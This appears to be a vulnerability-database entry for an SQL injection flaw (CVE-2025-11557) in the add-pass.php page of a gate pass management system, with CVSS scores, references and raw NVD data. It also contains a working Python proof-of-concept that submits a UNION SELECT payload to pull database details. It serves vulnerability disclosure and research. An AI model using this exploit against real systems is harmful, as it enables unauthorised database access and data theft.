CVE-2025-11557

Description

A vulnerability has been found in projectworlds Gate Pass Management System 1.0. This issue affects some unknown processing of the file /add-pass.php. Such manipulation of the argument fullname leads to sql injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:projectworlds:gate_pass_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

projectworlds Gate Pass Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11557 PoC - SQL Injection in Gate Pass Management System # Vulnerable endpoint: /add-pass.php # Vulnerable parameter: fullname import requests # Target configuration TARGET_URL = "http://target-host.com/add-pass.php" # SQL Injection payload targeting the 'fullname' parameter # This payload attempts to extract database version information SQL_PAYLOAD = "' UNION SELECT 1,version(),database(),user(),5,6,7,8-- -" def exploit_sqli(target_url, payload): """ Exploit SQL injection vulnerability in fullname parameter """ # Data to be submitted to the vulnerable endpoint data = { "fullname": payload, # Additional form fields may be required depending on the application "email": "[email protected]", "mobile": "1234567890", "address": "test", "reason": "test", "submit": "Submit" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post(target_url, data=data, headers=headers, timeout=10) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") # Check for successful injection indicators if "MySQL" in response.text or "MariaDB" in response.text: print("[+] SQL Injection successful! Database information may be exposed in response.") return response.text else: print("[-] Injection may have failed or response doesn't contain expected indicators.") return response.text except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": print("[*] CVE-2025-11557 - Gate Pass Management System SQL Injection PoC") print(f"[*] Target: {TARGET_URL}") print(f"[*] Payload: {SQL_PAYLOAD}") print("-" * 60) result = exploit_sqli(TARGET_URL, SQL_PAYLOAD) if result: print("[*] Response received. Analyze output for extracted data.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11557
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11557
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11557/
[4] VulDB https://vuldb.com/cve/CVE-2025-11557
[5] https://github.com/QIU-DIE/CVE/issues/6
[6] https://vuldb.com/?ctiid.327717
[7] https://vuldb.com/?id.327717
[8] https://vuldb.com/?submit.671406

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11557", "sourceIdentifier": "[email protected]", "published": "2025-10-09T21:15:35.160", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in projectworlds Gate Pass Management System 1.0. This issue affects some unknown processing of the file /add-pass.php. Such manipulation of the argument fullname leads to sql injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:projectworlds:gate_pass_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "480647AE-6ADC-4583-84D2-1DBA9DDD3859"}]}]}], "references": [{"url": "https://github.com/QIU-DIE/CVE/issues/6", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327717", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327717", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.671406", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}